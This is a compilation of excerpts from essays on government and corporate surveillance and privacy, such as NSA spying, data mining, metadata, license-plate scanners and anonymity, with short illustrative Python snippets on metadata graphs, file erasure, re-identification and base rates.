I've recently seen two articles speculating on the NSA's capability, and practice, of spying on members of Congress and other elected officials. The evidence is all circumstantial and smacks of conspiracy thinking—and I have no idea whether any of it is true or not—but it's a good illustration of what happens when trust in a public institution fails.
The NSA has repeatedly lied about the extent of its spying program. James R. Clapper, the director of national intelligence, has lied about it to Congress.
We Need Protection from Intelligence-Gathering Run Amok
This essay also appeared in the Livingston Daily and the Daily Journal.
If there's any confirmation that the U.S. government has commandeered the Internet for worldwide surveillance, it is what happened with Lavabit earlier this month.
Lavabit is—well, was—an e-mail service that offered more privacy than the typical large-Internet-corporation services that most of us use.
The scariest explanation of all? That the NSA and GCHQ are just showing they don't want to be messed with.
Last Sunday, David Miranda was detained while changing planes at London Heathrow Airport by British authorities for nine hours under a controversial British law—the maximum time allowable without making an arrest. There has been much made of the fact that he's the partner of Glenn Greenwald, the Guardian reporter whom Edward Snowden trusted with many of his NSA documents and the most prolific reporter of the surveillance abuses disclosed in those documents. There's less discussion of what I feel was the real reason for Miranda's detention. He was ferrying documents between Greenwald and Laura Poitras, a filmmaker and his co-reporter on Snowden and his information.
Technology companies have to fight for their users, or they'll eventually lose them.
It turns out that the NSA's domestic and world-wide surveillance apparatus is even more extensive than we thought. Bluntly: The government has commandeered the Internet. Most of the largest Internet companies provide information to the NSA, betraying their users. Some, as we've learned, fight and lose.
In July 2012, responding to allegations that the video-chat service Skype—owned by Microsoft—was changing its protocols to make it possible for the government to eavesdrop on users, Corporate Vice President Mark Gillett took to the company's blog to deny it.
Turns out that wasn't quite true.
Or at least he—or the company's lawyers—carefully crafted a statement that could be defended as true while completely deceiving the reader. You see, Skype wasn't changing its protocols to make it possible for the government to eavesdrop on users, because the government was already able to eavesdrop on users.
At a Senate hearing in March, Director of National Intelligence James Clapper assured the committee that his agency didn't collect data on hundreds of millions of Americans.
This essay also appeared in The Memphis Commercial Appeal, Stuff, The Guardian Comment Is Free, and Veterans Today.
Imagine the government passed a law requiring all citizens to carry a tracking device. Such a law would immediately be found unconstitutional. Yet we all carry mobile phones.
Edward Snowden broke the law by releasing classified information. This isn't under debate; it's something everyone with a security clearance knows. It's written in plain English on the documents you have to sign when you get a security clearance, and it's part of the culture. The law is there for a good reason, and secrecy has an important role in military defense.
The NSA's surveillance of cell-phone calls shows how badly we need to protect the whistle-blowers who provide transparency and accountability.
Yesterday, we learned that the NSA received all calling records from Verizon customers for a three-month period starting in April. That's everything except the voice content: who called who, where they were, how long the call lasted—for millions of people, both Americans and foreigners. This "metadata" allows the government to track the movements of everyone during that period, and build a detailed picture of who talks to whom. It's exactly the same data the Justice Department collected about AP journalists.
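A few lines of code make the point concrete: even with no voice content at all, the call records alone reconstruct the social graph. The records below are invented.

```python
from collections import defaultdict

# Invented call records: (caller, callee, minutes). No voice content,
# yet the metadata alone reveals who talks to whom, and how much.
records = [
    ("alice", "bob",   12),
    ("alice", "bob",    3),
    ("bob",   "carol", 45),
    ("alice", "dave",   1),
]

# Aggregate total talk time per unordered pair of people.
graph = defaultdict(int)
for caller, callee, minutes in records:
    graph[frozenset((caller, callee))] += minutes

# Alice's strongest contact falls straight out of the metadata.
alice_edges = {tuple(sorted(pair)): total
               for pair, total in graph.items() if "alice" in pair}
print(max(alice_edges, key=alice_edges.get))
```

Scale this from four records to every call in the country and the "detailed picture of who talks to whom" follows mechanically.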
The FBI wants a new law that will make it easier to wiretap the Internet. Although its claim is that the new law will only maintain the status quo, it's really much worse than that. This law will result in less-secure Internet products and create a foreign industry in more-secure alternatives. It will impose costly burdens on affected companies.
The internet has turned into a massive surveillance tool. We're constantly monitored on the internet by hundreds of companies—both familiar and unfamiliar. Everything we do there is recorded, collected, and collated—sometimes by corporations wanting to sell us stuff and sometimes by governments wanting to keep an eye on us.
Ephemeral conversation is over.
A new bill moving through Congress would give the authorities unprecedented access to citizens' information.
Our government collects a lot of information about us. Tax records, legal records, license records, records of government services received--it's all in databases that are increasingly linked and correlated. Still, there's a lot of personal information the government can't collect. Either they're prohibited by law from asking without probable cause and a judicial order, or they simply have no cost-effective way to collect it.
I'm going to start with three data points.
One: Some of the Chinese military hackers who were implicated in a broad set of attacks against the U.S. government and corporations were identified because they accessed Facebook from the same network infrastructure they used to carry out their attacks.
Two: Hector Monsegur, one of the leaders of the LulzSec hacker movement, was identified and arrested last year by the FBI.
Security Has Become a For-Profit Business
This is an edited version of a longer essay.
It's a new day for the New York Police Department, with technology increasingly informing the way cops do their jobs. With innovation come new possibilities, but also new concerns.
For one, the NYPD is testing a security apparatus that uses terahertz radiation to detect guns under clothing from a distance. As Police Commissioner Ray Kelly explained back in January, "If something is obstructing the flow of that radiation, for example a weapon, the device will highlight that object."
Ignore, for a moment, the glaring constitutional concerns, which make the stop-and-frisk debate pale in comparison: virtual strip-searching, evasion of probable cause, potential profiling.
Whether it's Syria using Facebook to help identify and arrest dissidents or China using its "Great Firewall" to limit access to international news throughout the country, repressive regimes all over the world are using the Internet to more efficiently implement surveillance, censorship, propaganda, and control. They're getting really good at it, and the IT industry is helping. We're helping by creating business applications -- categories of applications, really -- that are being repurposed by oppressive governments for their own use:
- What is called censorship when practiced by a government is content filtering when practiced by an organization. Many companies want to keep their employees from viewing porn or updating their Facebook pages while at work.
Internet Eyes is a U.K. startup designed to crowdsource digital surveillance. People pay a small fee to become a "Viewer." Once they do, they can log onto the site and view live anonymous feeds from surveillance cameras at retail stores. If they notice someone shoplifting, they can alert the store owner.
On Monday, The New York Times reported that President Obama will seek sweeping laws enabling law enforcement to more easily eavesdrop on the internet. Technologies are changing, the administration argues, and modern digital systems aren't as easy to monitor as traditional telephones.
The government wants to force companies to redesign their communications systems and information networks to facilitate surveillance, and to provide law enforcement with back doors that enable them to bypass any security measures.
The proposal may seem extreme, but -- unfortunately -- it's not unique.
As networking sites become more ubiquitous, it is long past the time to look at the types of data we put on those sites. We're using social networking websites for more private and more intimate interactions, often without thinking through the privacy implications of what we're doing.
The issues are hard and the solutions to them harder still, but I'm seeing a lot of confusion in even forming the questions.
Social networking sites deal with several different types of user data, and it's essential to separate them.
Lately I've been reading about user security and privacy -- control, really -- on social networking sites.
Below is my taxonomy of social networking data, which I first presented at the Internet Governance Forum meeting last November, and again -- revised -- at an OECD workshop on the role of Internet intermediaries in June.
This essay previously appeared in Information Security as the first half of a point-counterpoint with Marcus Ranum. Marcus's half is here.
Universal identification is portrayed by some as the holy grail of Internet security. Anonymity is bad, the argument goes; and if we abolish it, we can ensure only the proper people have access to their own information. We'll know who is sending us spam and who is trying to hack into corporate networks.
These companies and others say privacy erosion is inevitable--but they're making it so.
In January, Facebook Chief Executive Mark Zuckerberg declared the age of privacy to be over. A month earlier, Google Chief Eric Schmidt expressed a similar sentiment. Add Scott McNealy's and Larry Ellison's comments from a few years earlier, and you've got a whole lot of tech CEOs proclaiming the death of privacy--especially when it comes to young people.
It's just not true.
On January 19, a team of at least 15 people assassinated Hamas leader Mahmoud al-Mabhouh. The Dubai police released video footage of 11 of them. While it was obviously a very professional operation, the 27 minutes of video is fascinating in its banality. Team members walk through the airport, check in and out of hotels, get in and out of taxis.
Google made headlines when it went public with the fact that Chinese hackers had penetrated some of its services, such as Gmail, in a politically motivated attempt at intelligence gathering. The news here isn't that Chinese hackers engage in these activities or that their attempts are technically sophisticated -- we knew that already -- it's that the U.S. government inadvertently aided the hackers.
In order to comply with government search warrants on user data, Google created a backdoor access system into Gmail accounts.
Our use of social networking, as well as iPhones and Kindles, relinquishes control of how we delete files -- we need that back
File deletion is all about control. This used to not be an issue. Your data was on your computer, and you decided when and how to delete a file. You could use the delete function if you didn't care about whether the file could be recovered or not, and a file erase program -- I use BCWipe for Windows -- if you wanted to ensure no one could ever recover the file.
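The difference between deleting and erasing can be sketched in a few lines. This is a naive illustration of the overwrite idea only, not how BCWipe works; journaling filesystems, slack space, and SSD wear leveling can all preserve copies that a sketch like this never touches.

```python
import os

def naive_secure_erase(path, passes=3):
    """Overwrite a file with random bytes before unlinking it.

    A plain os.remove() only drops the directory entry; the file's
    bytes stay on disk until the space is reused. Overwriting first
    destroys them -- on a simple filesystem, at least.
    """
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            f.write(os.urandom(size))
            f.flush()
            os.fsync(f.fileno())  # push the overwrite to the physical disk
    os.remove(path)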
More and more people are using computers to chat with each other, but there's no such thing as a passing conversation on the Web
Facebook recently made changes to its service agreement in order to make members' data more accessible to other computer users. Amuse, Inc. announced last week that hackers stole credit-card information from about 150,000 clients. Hackers broke into the social network Twitter's system and stole documents.
Your online data is not private.
China is the world's most successful Internet censor. While the Great Firewall of China isn't perfect, it effectively limits information flowing in and out of the country. But now the Chinese government is taking things one step further.
Under a requirement taking effect soon, every computer sold in China will have to contain the Green Dam Youth Escort software package.
Reassuring people about privacy makes them more, not less, concerned. It's called "privacy salience", and Leslie John, Alessandro Acquisti, and George Loewenstein -- all at Carnegie Mellon University -- demonstrated this in a series of clever experiments. In one, subjects completed an online survey consisting of a series of questions about their academic behaviour -- "Have you ever cheated on an exam?" for example. Half of the subjects were first required to sign a consent warning -- designed to make privacy concerns more salient -- while the other half did not.
Last year, I wrote about the increasing propensity for governments, including the U.S. and Great Britain, to search the contents of people's laptops at customs. What we know is still based on anecdote, as no country has clarified the rules about what their customs officers are and are not allowed to do, and what rights people have.
Companies and individuals have dealt with this problem in several ways, from keeping sensitive data off laptops traveling internationally, to storing the data -- encrypted, of course -- on websites and then downloading it at the destination.
Do you know what your data did last night? Almost none of the more than 27 million people who took the RealAge quiz realized that their personal health data was being used by drug companies to develop targeted e-mail marketing campaigns.
There's a basic consumer protection principle at work here, and it's the concept of "unfair and deceptive" trade practices. Basically, a company shouldn't be able to say one thing and do another: sell used goods as new, lie on ingredients lists, advertise prices that aren't generally available, claim features that don't exist, and so on.
In the United States, the concept of "expectation of privacy" matters because it's the constitutional test, based on the Fourth Amendment, that governs when and how the government can invade your privacy.
Based on the 1967 Katz v. United States Supreme Court decision, this test actually has two parts. First, the government's action can't contravene an individual's subjective expectation of privacy; and second, that expectation of privacy must be one that society in general recognizes as reasonable.
Welcome to the future, where everything about you is saved. A future where your actions are recorded, your movements are tracked, and your conversations are no longer ephemeral. A future brought to you not by some 1984-like dystopia, but by the natural tendencies of computers to produce data.
Data is the pollution of the information age.
Earlier this month, the Supreme Court ruled that evidence gathered as a result of errors in a police database is admissible in court. Their narrow decision is wrong, and will only ensure that police databases remain error-filled in the future.
The specifics of the case are simple. A computer database said there was a felony arrest warrant pending for Bennie Herring when there actually wasn't.
The Internet isn't really for us. We're here at the beginning, stumbling around, just figuring out what it's good for and how to use it. The Internet is for those born into it, those who have woven it into their lives from the beginning. The Internet is the greatest generation gap since rock and roll, and only our children can hope to understand it.
As the first digital president, Barack Obama is learning the hard way how difficult it can be to maintain privacy in the information age. Earlier this year, his passport file was snooped by contract workers in the State Department. In October, someone at Immigration and Customs Enforcement leaked information about his aunt's immigration status. And in November, Verizon employees peeked at his cellphone records.
When he becomes president, Barack Obama will have to give up his BlackBerry. Aides are concerned that his unofficial conversations would become part of the presidential record, subject to subpoena and eventually made public as part of the country's historical record.
This reality of the information age might be particularly stark for the president, but it's no less true for all of us. Conversation used to be ephemeral.
Pervasive security cameras don't substantially reduce crime. There are exceptions, of course, and that's what gets the press. Most famously, CCTV cameras helped catch James Bulger's murderers in 1993. And earlier this year, they helped convict Steve Wright of murdering five women in the Ipswich area.
Last month a US court ruled that border agents can search your laptop, or any other electronic device, when you're entering the country. They can take your computer and download its entire contents, or keep it for several days. Customs and Border Protection has not published any rules regarding this practice, and I and others have written a letter to Congress urging it to investigate and regulate this practice.
But the US is not alone.
Dutch version by Jeroen van der Ham
In the information age, we all have a data shadow.
We leave data everywhere we go. It's not just our bank accounts and stock portfolios, or our itemized bills, listing every credit card purchase and telephone call we make. It's automatic road-toll collection systems, supermarket affinity cards, ATMs and so on.
When I write and speak about privacy, I am regularly confronted with the mutual disclosure argument. Explained in books like David Brin's The Transparent Society, the argument goes something like this: In a world of ubiquitous surveillance, you'll know all about me, but I will also know all about you. The government will be watching us, but we'll also be watching the government. This is different than before, but it's not automatically worse.
If there's a debate that sums up post-9/11 politics, it's security versus privacy. Which is more important? How much privacy are you willing to give up for security? Can we even afford privacy in this age of insecurity?
Last year, Netflix published 10 million movie rankings by 500,000 customers, as part of a challenge for people to come up with better recommendation systems than the one the company was using. The data was anonymized by removing personal details and replacing names with random numbers, to protect the privacy of the recommenders.
Arvind Narayanan and Vitaly Shmatikov, researchers at the University of Texas at Austin, de-anonymized some of the Netflix data by comparing rankings and timestamps with public information in the Internet Movie Database, or IMDb.
Their research (.pdf) illustrates some inherent security problems with anonymous data, but first it's important to explain what they did and did not do.
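The core of the linkage idea can be sketched with a toy example: count overlapping (movie, rating) pairs between the "anonymized" history and candidate public profiles. All data below is invented, and the real attack also exploited timestamps.

```python
# Toy linkage attack in the spirit of the Narayanan-Shmatikov result:
# an "anonymized" rating history is matched to a public profile by
# counting shared (movie, rating) pairs. All data here is invented.

anonymized_user = {("Brazil", 5), ("Heat", 4), ("Alien", 5), ("Big", 2)}

public_profiles = {
    "imdb_user_A": {("Brazil", 5), ("Heat", 4), ("Alien", 5)},
    "imdb_user_B": {("Big", 2), ("Jaws", 3)},
}

def best_match(anon, profiles):
    """Return the public identity sharing the most ratings with anon."""
    return max(profiles, key=lambda name: len(anon & profiles[name]))

print(best_match(anonymized_user, public_profiles))
```

Removing names did nothing here: the ratings themselves are the fingerprint.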
Computer security is hard. Software, computer and network security are all ongoing battles between attacker and defender. And in many cases the attacker has an inherent advantage: He only has to find one network flaw, while the defender has to find and fix every flaw.
Cryptography is an exception.
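One worked number shows why the defender wins here. The attacker's speed below is a deliberately generous, purely illustrative assumption.

```python
# Why cryptography is the exception: keyspaces outrun brute force.
# Illustrative arithmetic with a deliberately generous attacker.

keys = 2 ** 128                    # size of the AES-128 keyspace
guesses_per_second = 10 ** 18      # hypothetical, absurdly fast attacker
seconds_per_year = 60 * 60 * 24 * 365

years = keys / (guesses_per_second * seconds_per_year)
print(f"about {years:.0e} years to try every key")  # on the order of 1e13 years
```

Unlike a network, where one flaw dooms the defender, a well-designed cipher forces the attacker into a search that does not finish before the sun burns out.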
As the name implies, Alcoholics Anonymous meetings are anonymous. You don't have to sign anything, show ID or even reveal your real name. But the meetings are not private. Anyone is free to attend.
We learned the news in March: Contrary to decades of denials, the U.S. Census Bureau used individual records to round up Japanese-Americans during World War II.
The Census Bureau normally is prohibited by law from revealing data that could be linked to specific individuals; the law exists to encourage people to answer census questions accurately and without fear. And while the Second War Powers Act of 1942 temporarily suspended that protection in order to locate Japanese-Americans, the Census Bureau had maintained that it only provided general information about neighborhoods.
Testimony of Bruce Schneier
Security technologist, author, founder and CTO of BT Counterpane
"Will REAL ID Actually Make Us Safer?
An Examination of Privacy and Civil Liberties Concerns"
Senate Judiciary Committee
Room 226, Dirksen Senate Office Building
Tuesday, May 8, 2007
I appreciate the opportunity to appear before the Committee today to discuss privacy issues. My name is Bruce Schneier. I am a security technologist, author, and CTO of BT Counterpane.
This essay appeared as part of a point-counterpoint with Marcus Ranum. Marcus's side, to which this is a response, can be found on his website.
Big Brother isn't what he used to be. George Orwell extrapolated his totalitarian state from the 1940s. Today's information society looks nothing like Orwell's world, and watching and intimidating a population today isn't anything like what Winston Smith experienced.
On Wednesday, Mayor Bloomberg announced that New York will be the first city with 911 call centers able to receive images and videos from cell phones and computers. If you witness a crime, you can not only call in - you can send in a picture or video as well.
This is a great idea that can make us all safer. Often the biggest problem a 911 operator has is getting enough good information from the caller.
San Francisco police have a new law enforcement tool: a car-mounted license-plate scanner. Similar to a radar gun, it reads the license plates of moving or parked cars -- 250 or more per hour -- and links with remote police databases, immediately providing information about the car and its owner. Right now, the police check for unpaid parking tickets. A car that comes up positive on the database is booted.
This article was published under the title "They're Watching."
If you've traveled abroad recently, you've been investigated. You've been assigned a score indicating what kind of terrorist threat you pose. That score is used by the government to determine the treatment you receive when you return to the U.S. and for other purposes as well.
This essay appeared as the second half of a point-counterpoint with Marcus Ranum. Marcus's side can be found on his website.
Personal information protection is an economic problem, not a security problem. And the problem can be easily explained: The organizations we trust to protect our personal information do not suffer when information gets exposed. On the other hand, individuals who suffer when personal information is exposed don't have the capability to protect that information.
The political firestorm over former U.S. Rep. Mark Foley's salacious instant messages hides another issue, one about privacy. We are rapidly turning into a society where our intimate conversations can be saved and made public later. This represents an enormous loss of freedom and liberty, and the only way to solve the problem is through legislation.
Earlier this month, the popular social networking site Facebook learned a hard lesson in privacy. It introduced a new feature called "News Feeds" that shows an aggregation of everything members do on the site, such as added and deleted friends, a change in relationship status, a new favorite song, a new interest. Instead of a member's friends having to go to his page to view any changes, these changes are all presented to them automatically.
The outrage was enormous.
Better to Put People, Not Computers, in Charge of Investigating Potential Plots
Collecting information about every American's phone calls is an example of data mining. The basic idea is to collect as much information as possible on everyone, sift through it with massive computers, and uncover terrorist plots. It's a compelling idea, and convinces many. But it's wrong.
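The arithmetic behind that "wrong" is the base-rate problem. The numbers below are illustrative assumptions, deliberately generous to the detector.

```python
# The base-rate problem: even an unrealistically accurate detector,
# aimed at a vanishingly rare event, buries real hits in false alarms.
# All numbers are illustrative assumptions.

population = 300_000_000       # people whose records are mined
plotters = 1_000               # actual plotters (a generous guess)
true_positive_rate = 0.99      # detector flags 99% of real plotters
false_positive_rate = 0.001    # and only 0.1% of innocent people

hits = plotters * true_positive_rate
false_alarms = (population - plotters) * false_positive_rate

precision = hits / (hits + false_alarms)
print(f"{precision:.2%} of flagged people are actual plotters")
```

Roughly 300,000 innocent people get flagged alongside fewer than a thousand real plotters, so nearly every lead is false, and investigators drown.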
The most common retort against privacy advocates -- by those in favor of ID checks, cameras, databases, data mining and other wholesale surveillance measures -- is this line: "If you aren't doing anything wrong, what do you have to hide?"
Some clever answers: "If I'm not doing anything wrong, then you have no cause to watch me." "Because the government gets to define what's wrong, and they keep changing the definition." "Because you might do something wrong with my information." My problem with quips like these -- as right as they are -- is that they accept the premise that privacy is about hiding a wrong. It's not. Privacy is an inherent human right, and a requirement for maintaining the human condition with dignity and respect.
Two proverbs say it best: Quis custodiet custodes ipsos? ("Who watches the watchers?") and "Absolute power corrupts absolutely."
Cardinal Richelieu understood the value of surveillance when he famously said, "If one would give me six lines written by the hand of the most honest man, I would find something in them to have him hanged." Watch someone long enough, and you'll find something to arrest -- or just blackmail -- with.
Over the past 20 years, there's been a sea change in the battle for personal privacy.
The pervasiveness of computers has resulted in the almost constant surveillance of everyone, with profound implications for our society and our freedoms. Corporations and the police are both using this new trove of surveillance data. We as a society need to understand the technological trends and discuss their implications.
In a recent essay, Kevin Kelly warns of the dangers of anonymity. It's OK in small doses, he maintains, but too much of it is a problem: "(I)n every system that I have seen where anonymity becomes common, the system fails. The recent taint in the honor of Wikipedia stems from the extreme ease which anonymous declarations can be put into a very visible public record. Communities infected with anonymity will either collapse, or shift the anonymous to pseudo-anonymous, as in eBay, where you have a traceable identity behind an invented nickname."
Kelly has a point, but it comes out all wrong.
Spying tools are now routinely used against ordinary, law-abiding Americans who have no connection to terrorism.
Christmas 2003, Las Vegas. Intelligence hinted at a terrorist attack on New Year's Eve. In the absence of any real evidence, the FBI tried to compile a real-time database of everyone who was visiting the city. It collected customer data from airlines, hotels, casinos, rental car companies, even storage locker rental companies. All this information went into a massive database -- probably close to a million people overall -- that the FBI's computers analyzed, looking for links to known terrorists.
At John Roberts' confirmation hearings last week, there wasn't enough discussion of science fiction. Technologies that are science fiction today will become constitutional questions before Roberts retires from the bench. The same goes for technologies that cannot even be conceived of now. And many of these questions involve privacy.
The epidemic of personal data thefts and losses - most recently, data on 40 million individuals held by Visa and MasterCard - should concern us for two reasons: personal privacy and identity theft.
Real reform is required to solve these problems. We need to reduce the amount of personal information collected, limit how it can be used and resold, and require companies that mishandle our data to be liable for that mishandling. And, most importantly, we need to make financial institutions liable for fraudulent transactions.
Reports are coming in torrents. Criminals are known to have downloaded personal credit information of over 145,000 Americans from ChoicePoint's network. Hackers took over one of LexisNexis' databases, gaining access to personal files of 32,000 people. Bank of America Corp. lost computer data tapes that contained personal information on 1.2 million federal employees, including members of the U.S. Senate.
In the post-9/11 world, there's much focus on connecting the dots. Many believe data mining is the crystal ball that will enable us to uncover future terrorist plots. But even in the most wildly optimistic projections, data mining isn't tenable for that purpose. We're not trading privacy for security; we're giving up privacy and getting no security in return.
Opinion: The courts need to recognize that in the information age, virtual privacy and physical privacy don't have the same boundaries.
For at least seven months last year, a hacker had access to T-Mobile's customer network. He is known to have accessed information belonging to 400 customers—names, Social Security numbers, voice mail messages, SMS messages, photos—and probably had the ability to access data belonging to any of T-Mobile's 16.3 million U.S. customers.
The World Series is no stranger to security. Fans try to sneak into the ballpark without tickets or with counterfeit tickets. Often food and alcohol are prohibited from being brought into the ballpark, to enforce the monopoly of the high-priced concessions.
Violence is always a risk: both small fights and larger-scale riots that result when fans of both teams are in such close proximity -- like the one that almost happened during the sixth game of the American League Championship Series.
Since the terrorist attacks of 2001, the Bush administration -- specifically, the Department of Homeland Security -- has wanted the world to agree on a standard for machine-readable passports. Countries whose citizens currently do not have visa requirements to enter the United States will have to issue passports that conform to the standard or risk losing their nonvisa status.
These future passports, currently being tested, will include an embedded computer chip. This chip will allow the passport to contain much more information than a simple machine-readable character font, and will allow passport officials to quickly and easily read that information.
The Baltimore housing department has a new tool to find homeowners who have been building rooftop decks without a permit: aerial mapping. Baltimore bought aerial photographs of the entire city and used software to correlate the images with databases of address information and permit records. Inspectors have just begun knocking on doors of residents who built decks without permission.
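The article doesn't specify what software the city used; a minimal invented sketch of the kind of cross-referencing it describes might look like this, with addresses where imagery analysis flagged a rooftop deck checked against a permit database (all names and data here are hypothetical):

```python
def flag_unpermitted(detected_decks, permits):
    """Return addresses with a detected deck but no matching deck permit."""
    permitted = {p["address"] for p in permits if p["type"] == "rooftop deck"}
    return sorted(addr for addr in detected_decks if addr not in permitted)

# Invented example data: three flagged addresses, two permits on file.
detected = ["12 Calvert St", "301 Light St", "88 Pratt St"]
permits = [
    {"address": "301 Light St", "type": "rooftop deck"},
    {"address": "88 Pratt St", "type": "fence"},  # permit, but not for a deck
]

print(flag_unpermitted(detected, permits))  # ['12 Calvert St', '88 Pratt St']
```

The interesting part is not the set difference itself but the data pipeline feeding it: once imagery, addresses, and permit records live in compatible databases, this kind of dragnet check becomes nearly free to run citywide.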
On the face of it, this is nothing new.
New Haven police have a new law enforcement tool: a license-plate scanner. Similar to a radar gun, it reads the license plates of moving or parked cars and links with remote police databases, immediately providing information about the car and owner. Right now the police check if there are any taxes owed on the car, if the car or license plate is stolen, and if the car is unregistered or uninsured. A car that comes up positive is towed.
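The lookup pipeline described above can be sketched in a few lines; this is a hypothetical illustration, not the actual police system, and all record fields and data are invented:

```python
# Invented stand-in for the remote databases the scanner queries.
RECORDS = {
    "ABC123": {"taxes_owed": True, "stolen": False, "registered": True, "insured": True},
    "XYZ789": {"taxes_owed": False, "stolen": False, "registered": True, "insured": True},
}

def check_plate(plate):
    """Return the list of reasons a scanned car would be flagged, if any."""
    rec = RECORDS.get(plate)
    if rec is None:
        return ["no record on file"]
    reasons = []
    if rec["taxes_owed"]:
        reasons.append("taxes owed")
    if rec["stolen"]:
        reasons.append("reported stolen")
    if not rec["registered"]:
        reasons.append("unregistered")
    if not rec["insured"]:
        reasons.append("uninsured")
    return reasons

print(check_plate("ABC123"))  # ['taxes owed']
print(check_plate("XYZ789"))  # []
```

Note how the checks are just a list: adding a new reason to flag a car is a one-line change, which is exactly why the set of things scanned for tends to grow over time.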
In the wake of the U.S. Department of Homeland Security's awarding of its largest contract, for a system to fingerprint and to keep tabs on foreign visitors in the United States, it makes sense to evaluate our country's response to terrorism. Are we getting good value for all the money that we're spending?
US-VISIT is a government program to help identify the 23 million foreigners who visit the United States every year.
As technological monitoring grows more prevalent, court supervision is crucial
Years ago, surveillance meant trench-coated detectives following people down streets.
Today's detectives are more likely to be sitting in front of a computer, and the surveillance is electronic. It's cheaper, easier and safer. But it's also much more prone to abuse.
At a gas station in British Columbia, two employees installed a camera in the ceiling in front of an ATM. They recorded thousands of people as they typed in their PINs. Combined with a false front on the ATM that recorded account numbers from the cards, the pair were able to steal millions before they were caught.
In at least 14 Kinko's copy shops in New York City, Juju Jiang installed keystroke loggers on the rentable computers.
In September 2002, JetBlue Airways secretly turned over data about 1.5 million of its passengers to a company called Torch Concepts, under contract with the Department of Defense.
Torch Concepts merged this data with Social Security numbers, home addresses, income levels and automobile records that it purchased from another company, Acxiom Corp. All this was done to test an automated profiling system that would assign each person a terrorist threat ranking.
The events of 11 September offer a rare chance to rethink public security.
Appalled by the events of 11 September, many Americans have declared so loudly that they are willing to give up civil liberties in the name of security that this trade-off seems to be a fait accompli. Article after article in the popular media debates the 'balance' of privacy and security -- are various types of increase in security worth the consequent losses to privacy and civil liberty? Rarely do I see discussion about whether this linkage is valid.
Security and privacy are not two sides of an equation.
Good news! The federal government respects and is working to protect your privacy... just as long as you don't want privacy from the government itself.
In April 1994, the Clinton administration, cleaning up business left over from the Bush administration, introduced a cryptography initiative that ensures the government's ability to conduct electronic surveillance. The first fruit of this initiative is Clipper, a National Security Agency (NSA)-designed, tamper-resistant VLSI chip. The stated purpose of this chip is to secure telecommunications.
Clipper uses a classified encryption algorithm.